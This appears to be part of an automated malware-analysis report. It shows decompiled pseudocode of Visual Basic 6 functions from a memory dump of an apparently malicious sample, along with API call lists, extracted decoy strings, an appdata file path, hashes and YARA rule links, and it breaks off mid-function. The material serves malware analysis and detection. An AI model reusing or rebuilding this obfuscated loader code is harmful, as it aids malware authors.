Picry, xrefs: 0041F673
f, xrefs: 0041F8FE
Langfredagene5, xrefs: 0041F6AB
appdata, xrefs: 0041F63D
Skovede1, xrefs: 0041F890
SUPERSERIOUS, xrefs: 0041F802

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
API String ID: 1362175604-1043247457
Opcode ID: d053ce57bb6c2fa670306dd2f3c511b461d559c05ec4809760b14aaf4aa99e59
Instruction ID: 72db7ed7764511de285238dba7bf656f0ee13bd3408aae9487a22c2cee5c9056
Opcode Fuzzy Hash: d053ce57bb6c2fa670306dd2f3c511b461d559c05ec4809760b14aaf4aa99e59
Instruction Fuzzy Hash: 63810A72D00218ABDB10EBA1DC45FDEB7B8BF04304F1085AAE115B71A1DB785B89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F970, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041F970(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				short _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				char* _v100;
				char _v108;
				char* _v116;
				char _v124;
				short _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				signed int _t69;
				signed int _t73;
				short _t77;
				char* _t82;
				intOrPtr _t111;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				L00401540();
				_v12 = _t111;
				_v8 = 0x4013b0;
				if( *0x4223c0 != 0) {
					_v164 = 0x4223c0;
				} else {
					_push(0x4223c0);
					_push(0x40258c);
					L004017CE();
					_v164 = 0x4223c0;
				}
				_v144 =  *_v164;
				_t69 =  *((intOrPtr*)( *_v144 + 0x4c))(_v144,  &_v44);
				asm("fclex");
				_v148 = _t69;
				if(_v148 >= 0) {
					_v168 = _v168 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x40257c);
					_push(_v144);
					_push(_v148);
					L004017C8();
					_v168 = _t69;
				}
				_v152 = _v44;
				_t73 =  *((intOrPtr*)( *_v152 + 0x28))(_v152);
				asm("fclex");
				_v156 = _t73;
				if(_v156 >= 0) {
					_v172 = _v172 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x402ed8);
					_push(_v152);
					_push(_v156);
					L004017C8();
					_v172 = _t73;
				}
				L004017C2();
				_push(0x3139);
				L0040169C();
				L0040183A();
				_push(0x64);
				_push(_v32);
				L00401750();
				L0040183A();
				_push(_t73);
				_push(L"Sciuroid8");
				L0040172C();
				asm("sbb eax, eax");
				_v144 =  ~( ~( ~_t73));
				L00401846();
				_t77 = _v144;
				if(_t77 != 0) {
					_v100 = L"appdata";
					_v108 = 8;
					L0040184C();
					_push( &_v60);
					_push( &_v76);
					L0040171A();
					_v116 = L"\\qc17";
					_v124 = 8;
					_push( &_v76);
					_push( &_v124);
					_t82 =  &_v92;
					_push(_t82);
					L00401720();
					_push(_t82);
					L00401834();
					L0040183A();
					_push(_t82);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v24);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0x59);
					_push( &_v60);
					L00401708();
					_t77 =  &_v60;
					_push(_t77);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"Rutiner");
				L004017EC();
				_v28 = _t77;
				_push(0x41fbec);
				L00401846();
				L00401846();
				L00401846();
				return _t77;
			}

0x0041f975
0x0041f980
0x0041f981
0x0041f98d
0x0041f995
0x0041f998
0x0041f9a6
0x0041f9c3
0x0041f9a8
0x0041f9a8
0x0041f9ad
0x0041f9b2
0x0041f9b7
0x0041f9b7
0x0041f9d5
0x0041f9ed
0x0041f9f0
0x0041f9f2
0x0041f9ff
0x0041fa21
0x0041fa01
0x0041fa01
0x0041fa03
0x0041fa08
0x0041fa0e
0x0041fa14
0x0041fa19
0x0041fa19
0x0041fa2b
0x0041fa3f
0x0041fa42
0x0041fa44
0x0041fa51
0x0041fa73
0x0041fa53
0x0041fa53
0x0041fa55
0x0041fa5a
0x0041fa60
0x0041fa66
0x0041fa6b
0x0041fa6b
0x0041fa7d
0x0041fa82
0x0041fa87
0x0041fa91
0x0041fa96
0x0041fa98
0x0041fa9b
0x0041faa5
0x0041faaa
0x0041faab
0x0041fab0
0x0041fab7
0x0041fabd
0x0041fac7
0x0041facc
0x0041fad5
0x0041fadb
0x0041fae2
0x0041faef
0x0041faf7
0x0041fafb
0x0041fafc
0x0041fb01
0x0041fb08
0x0041fb12
0x0041fb16
0x0041fb17
0x0041fb1a
0x0041fb1b
0x0041fb20
0x0041fb21
0x0041fb2b
0x0041fb30
0x0041fb31
0x0041fb33
0x0041fb35
0x0041fb3a
0x0041fb42
0x0041fb4a
0x0041fb4e
0x0041fb52
0x0041fb53
0x0041fb55
0x0041fb5d
0x0041fb62
0x0041fb63
0x0041fb65
0x0041fb6a
0x0041fb6c
0x0041fb71
0x0041fb76
0x0041fb77
0x0041fb7c
0x0041fb7f
0x0041fb80
0x0041fb8a
0x0041fb92
0x0041fb92
0x0041fb97
0x0041fb9c
0x0041fba1
0x0041fba5
0x0041fbd6
0x0041fbde
0x0041fbe6
0x0041fbeb

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F98D
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,?,00401546), ref: 0041F9B2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,0000004C), ref: 0041FA14
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402ED8,00000028), ref: 0041FA66
__vbaFreeObj.MSVBVM60 ref: 0041FA7D
#697.MSVBVM60(00003139), ref: 0041FA87
__vbaStrMove.MSVBVM60(00003139), ref: 0041FA91
#618.MSVBVM60(?,00000064,00003139), ref: 0041FA9B
__vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041FAA5
__vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FAB0
__vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FAC7
__vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FAEF
#666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FAFC
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB1B
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB21
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB2B
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB3A
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB42
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041FB55
__vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041FB65
__vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041FB6C
#526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041FB77
__vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FB80
__vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FB8A
__vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FB92
#696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB9C
__vbaFreeStr.MSVBVM60(0041FBEC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FBD6
__vbaFreeStr.MSVBVM60(0041FBEC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FBDE
__vbaFreeStr.MSVBVM60(0041FBEC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FBE6

Strings

Sciuroid8, xrefs: 0041FAAB
appdata, xrefs: 0041FADB
\qc17, xrefs: 0041FB01
Rutiner, xrefs: 0041FB97

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
String ID: Rutiner$Sciuroid8$\qc17$appdata
API String ID: 862176544-1118470403
Opcode ID: d563e83113586be7518ae4c46cc7268fc448b2797e501167b8352701fe0a0256
Instruction ID: cc260dfea6bdc49058e09965aefa1c1e5f1646950092b920b98befd8941e58ed
Opcode Fuzzy Hash: d563e83113586be7518ae4c46cc7268fc448b2797e501167b8352701fe0a0256
Instruction Fuzzy Hash: DE51FC71940218AEDB10EBA1CC46FDEB7B8AF14708F5041BAF105B71E1DB785A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB3A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041EB3A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				short _v40;
				char _v44;
				void* _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				void* _v100;
				char _v104;
				void* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				char* _t86;
				char* _t87;
				signed int _t91;
				signed int _t98;
				short _t102;
				signed int _t108;
				signed int _t113;
				void* _t134;
				void* _t136;
				intOrPtr _t137;

				_t137 = _t136 - 0xc;
				 *[fs:0x0] = _t137;
				L00401540();
				_v16 = _t137;
				_v12 = 0x401330;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401546, _t134);
				L00401708();
				_t86 =  &_v44;
				L00401858();
				L004016D8();
				L0040183A();
				L00401846();
				L00401828();
				L00401792();
				_t87 =  &_v48;
				L00401798();
				_v108 = _t87;
				_t91 =  *((intOrPtr*)( *_v108 + 0x1c))(_v108,  &_v104, _t87, _t86, L"Flimflam", L"Fribords2", _t86, _t86,  &_v64, 1, 0xffffffff, 0,  &_v64, 0xe8);
				asm("fclex");
				_v112 = _t91;
				if(_v112 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40265c);
					_push(_v108);
					_push(_v112);
					L004017C8();
					_v132 = _t91;
				}
				_v56 = _v104;
				_v64 = 3;
				_push( &_v64);
				_push( &_v80);
				L00401678();
				_push( &_v80);
				L00401834();
				L0040183A();
				L004017C2();
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401840();
				_v56 = 0x7042c;
				_v64 = 3;
				_t98 =  &_v64;
				_push(_t98);
				L004017E6();
				L0040183A();
				_push(_t98);
				_push(L"INVALIDNESS");
				L0040172C();
				asm("sbb eax, eax");
				_v108 =  ~( ~_t98 + 1);
				L00401846();
				L00401828();
				_t102 = _v108;
				if(_t102 != 0) {
					L00401672();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v136 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v136 = 0x4223c0;
					}
					_v108 =  *_v136;
					_t108 =  *((intOrPtr*)( *_v108 + 0x14))(_v108,  &_v48);
					asm("fclex");
					_v112 = _t108;
					if(_v112 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v108);
						_push(_v112);
						L004017C8();
						_v140 = _t108;
					}
					_v116 = _v48;
					_t113 =  *((intOrPtr*)( *_v116 + 0x68))(_v116,  &_v100);
					asm("fclex");
					_v120 = _t113;
					if(_v120 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x40259c);
						_push(_v116);
						_push(_v120);
						L004017C8();
						_v144 = _t113;
					}
					_t102 = _v100;
					_v40 = _t102;
					L004017C2();
				}
				_push(0x41edbd);
				L00401846();
				L00401846();
				L00401846();
				return _t102;
			}

0x0041eb3d
0x0041eb4c
0x0041eb56
0x0041eb5e
0x0041eb61
0x0041eb68
0x0041eb77
0x0041eb83
0x0041eb92
0x0041eb96
0x0041eba6
0x0041ebb0
0x0041ebb8
0x0041ebc0
0x0041ebc5
0x0041ebcb
0x0041ebcf
0x0041ebd4
0x0041ebe3
0x0041ebe6
0x0041ebe8
0x0041ebef
0x0041ec08
0x0041ebf1
0x0041ebf1
0x0041ebf3
0x0041ebf8
0x0041ebfb
0x0041ebfe
0x0041ec03
0x0041ec03
0x0041ec0f
0x0041ec12
0x0041ec1c
0x0041ec20
0x0041ec21
0x0041ec29
0x0041ec2a
0x0041ec34
0x0041ec3c
0x0041ec44
0x0041ec48
0x0041ec49
0x0041ec4b
0x0041ec53
0x0041ec5a
0x0041ec61
0x0041ec64
0x0041ec65
0x0041ec6f
0x0041ec74
0x0041ec75
0x0041ec7a
0x0041ec81
0x0041ec86
0x0041ec8d
0x0041ec95
0x0041ec9a
0x0041eca0
0x0041eca6
0x0041ecb0
0x0041ecbc
0x0041ecd9
0x0041ecbe
0x0041ecbe
0x0041ecc3
0x0041ecc8
0x0041eccd
0x0041eccd
0x0041eceb
0x0041ecfa
0x0041ecfd
0x0041ecff
0x0041ed06
0x0041ed22
0x0041ed08
0x0041ed08
0x0041ed0a
0x0041ed0f
0x0041ed12
0x0041ed15
0x0041ed1a
0x0041ed1a
0x0041ed2c
0x0041ed3b
0x0041ed3e
0x0041ed40
0x0041ed47
0x0041ed63
0x0041ed49
0x0041ed49
0x0041ed4b
0x0041ed50
0x0041ed53
0x0041ed56
0x0041ed5b
0x0041ed5b
0x0041ed6a
0x0041ed6e
0x0041ed75
0x0041ed75
0x0041ed7a
0x0041eda7
0x0041edaf
0x0041edb7
0x0041edbc

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EB56
#526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041EB83
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EB96
#712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBA6
__vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBB0
__vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBB8
__vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBC0
#685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBC5
__vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041EBCF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040265C,0000001C), ref: 0041EBFE
#613.MSVBVM60(?,00000003), ref: 0041EC21
__vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041EC2A
__vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041EC34
__vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041EC3C
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041EC4B
#574.MSVBVM60(00000003), ref: 0041EC65
__vbaStrMove.MSVBVM60(00000003), ref: 0041EC6F
__vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EC7A
__vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EC8D
__vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EC95
#611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041ECA6
__vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041ECB0
__vbaNew2.MSVBVM60(0040258C,004223C0,INVALIDNESS,00000000,00000003), ref: 0041ECC8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 0041ED15
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000068), ref: 0041ED56
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,00000068), ref: 0041ED75
__vbaFreeStr.MSVBVM60(0041EDBD,INVALIDNESS,00000000,00000003), ref: 0041EDA7
__vbaFreeStr.MSVBVM60(0041EDBD,INVALIDNESS,00000000,00000003), ref: 0041EDAF
__vbaFreeStr.MSVBVM60(0041EDBD,INVALIDNESS,00000000,00000003), ref: 0041EDB7

Strings

Fribords2, xrefs: 0041EB9C
Flimflam, xrefs: 0041EBA1
INVALIDNESS, xrefs: 0041EC75

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
String ID: Flimflam$Fribords2$INVALIDNESS
API String ID: 2258197736-3412120936
Opcode ID: 61d28b5211cb304e5f34d5cda738984cdf7262fe57e9fb893691fb7f9d676be2
Instruction ID: ba3fe2f6aa9922b2674dc6d2d813e94d93e7435dddd3fb8784192e01bb62a300
Opcode Fuzzy Hash: 61d28b5211cb304e5f34d5cda738984cdf7262fe57e9fb893691fb7f9d676be2
Instruction Fuzzy Hash: 8C710675D00208AFDB00EBA6D885BDDBBB8BF08704F50812AF505BB1E1EB785A45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFE4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041EFE4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				char _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char* _v92;
				char _v100;
				char* _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				signed int _v164;
				short _t110;
				char* _t112;
				signed int _t118;
				signed int _t123;
				signed int _t130;
				char* _t133;
				signed int _t136;
				intOrPtr _t168;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				L00401540();
				_v12 = _t168;
				_v8 = 0x401368;
				L004017B6();
				L004017B6();
				L004017B6();
				_v92 =  &_v44;
				_v100 = 0x4008;
				_push( &_v100);
				_push( &_v68);
				L0040181C();
				_v108 = L"ICHTHYOPOLISM";
				_v116 = 0x8008;
				_push( &_v68);
				_t110 =  &_v116;
				_push(_t110);
				L00401660();
				_v120 = _t110;
				L00401828();
				if(_v120 != 0) {
					if( *0x4223c0 != 0) {
						_v144 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v144 = 0x4223c0;
					}
					_v120 =  *_v144;
					_t118 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t118;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v148 = _t118;
					}
					_v128 = _v52;
					_t123 =  *((intOrPtr*)( *_v128 + 0xd8))(_v128,  &_v48);
					asm("fclex");
					_v132 = _t123;
					if(_v132 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0xd8);
						_push(0x40259c);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v152 = _t123;
					}
					_v140 = _v48;
					_v48 = _v48 & 0x00000000;
					L0040183A();
					L004017C2();
					if( *0x4223c0 != 0) {
						_v156 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40258c);
						L004017CE();
						_v156 = 0x4223c0;
					}
					_v120 =  *_v156;
					_t130 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t130;
					if(_v124 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40257c);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v160 = _t130;
					}
					_v128 = _v52;
					_v108 = 0x80020004;
					_v116 = 0xa;
					_v60 = 0x92ac1b00;
					_v56 = 0x5af5;
					_v68 = 6;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t133 =  &_v68;
					L0040165A();
					L0040183A();
					_t136 =  *((intOrPtr*)( *_v128 + 0x13c))(_v128, _t133, _t133, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe, 0x10);
					asm("fclex");
					_v132 = _t136;
					if(_v132 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x40259c);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v164 = _t136;
					}
					L00401846();
					L004017C2();
					L00401828();
				}
				_v60 = 0x607e9f;
				_v68 = 3;
				_t112 =  &_v68;
				_push(_t112);
				L0040166C();
				L0040183A();
				L00401828();
				_v24 = 0x5b2ec5;
				_push(0x41f303);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t112;
			}

0x0041efe9
0x0041eff4
0x0041eff5
0x0041f001
0x0041f009
0x0041f00c
0x0041f019
0x0041f024
0x0041f031
0x0041f039
0x0041f03c
0x0041f046
0x0041f04a
0x0041f04b
0x0041f050
0x0041f057
0x0041f061
0x0041f062
0x0041f065
0x0041f066
0x0041f06b
0x0041f072
0x0041f07d
0x0041f08a
0x0041f0a7
0x0041f08c
0x0041f08c
0x0041f091
0x0041f096
0x0041f09b
0x0041f09b
0x0041f0b9
0x0041f0c8
0x0041f0cb
0x0041f0cd
0x0041f0d4
0x0041f0f0
0x0041f0d6
0x0041f0d6
0x0041f0d8
0x0041f0dd
0x0041f0e0
0x0041f0e3
0x0041f0e8
0x0041f0e8
0x0041f0fa
0x0041f109
0x0041f10f
0x0041f111
0x0041f118
0x0041f137
0x0041f11a
0x0041f11a
0x0041f11f
0x0041f124
0x0041f127
0x0041f12a
0x0041f12f
0x0041f12f
0x0041f141
0x0041f147
0x0041f154
0x0041f15c
0x0041f168
0x0041f185
0x0041f16a
0x0041f16a
0x0041f16f
0x0041f174
0x0041f179
0x0041f179
0x0041f197
0x0041f1a6
0x0041f1a9
0x0041f1ab
0x0041f1b2
0x0041f1ce
0x0041f1b4
0x0041f1b4
0x0041f1b6
0x0041f1bb
0x0041f1be
0x0041f1c1
0x0041f1c6
0x0041f1c6
0x0041f1d8
0x0041f1db
0x0041f1e2
0x0041f1e9
0x0041f1f0
0x0041f1f7
0x0041f201
0x0041f20b
0x0041f20c
0x0041f20d
0x0041f20e
0x0041f217
0x0041f21b
0x0041f225
0x0041f233
0x0041f239
0x0041f23b
0x0041f242
0x0041f261
0x0041f244
0x0041f244
0x0041f249
0x0041f24e
0x0041f251
0x0041f254
0x0041f259
0x0041f259
0x0041f26b
0x0041f273
0x0041f27b
0x0041f27b
0x0041f280
0x0041f287
0x0041f28e
0x0041f291
0x0041f292
0x0041f29c
0x0041f2a4
0x0041f2a9
0x0041f2b0
0x0041f2dd
0x0041f2e5
0x0041f2ed
0x0041f2f5
0x0041f2fd
0x0041f302

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F001
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F019
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F024
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F031
#524.MSVBVM60(?,00004008), ref: 0041F04B
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F066
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F072
__vbaNew2.MSVBVM60(0040258C,004223C0,00008008,?,?,?,?,00004008), ref: 0041F096
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F0E3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F12A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F154
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F15C
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F174
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041F1C1
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F201
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F21B
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F225
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F254
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F26B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F273
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F27B
#536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F292
__vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F29C
__vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F2A4
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2DD
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2E5
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2ED
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2F5
__vbaFreeStr.MSVBVM60(0041F303,00000003,00008008,?,?,?,?,00004008), ref: 0041F2FD

Strings

Gurgledes, xrefs: 0041F029
ICHTHYOPOLISM, xrefs: 0041F050

Memory Dump Source

Source File: 00000000.00000002.816436718.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.816432009.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.816461471.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.816466735.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
String ID: Gurgledes$ICHTHYOPOLISM
API String ID: 2536202667-1995639141
Opcode ID: dbb2e53154abe45100cd9caffe59d6aaeb0614202a8b407e753c84149f1a7871
Instruction ID: 720fcd5b48a0563e29dae46cf2584c25484159a1554e856bec4d34874f29d809
Opcode Fuzzy Hash: dbb2e53154abe45100cd9caffe59d6aaeb0614202a8b407e753c84149f1a7871
Instruction Fuzzy Hash: 9E91F771D00218EFDB10EFA5C985BDDBBB5BF09304F20816AE105B72A2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F31E, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041F31E(void* __ebx, void* __edi, void* __esi, void* _a16, void* _a20, signed int* _a24) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v48;
				void* _v52;
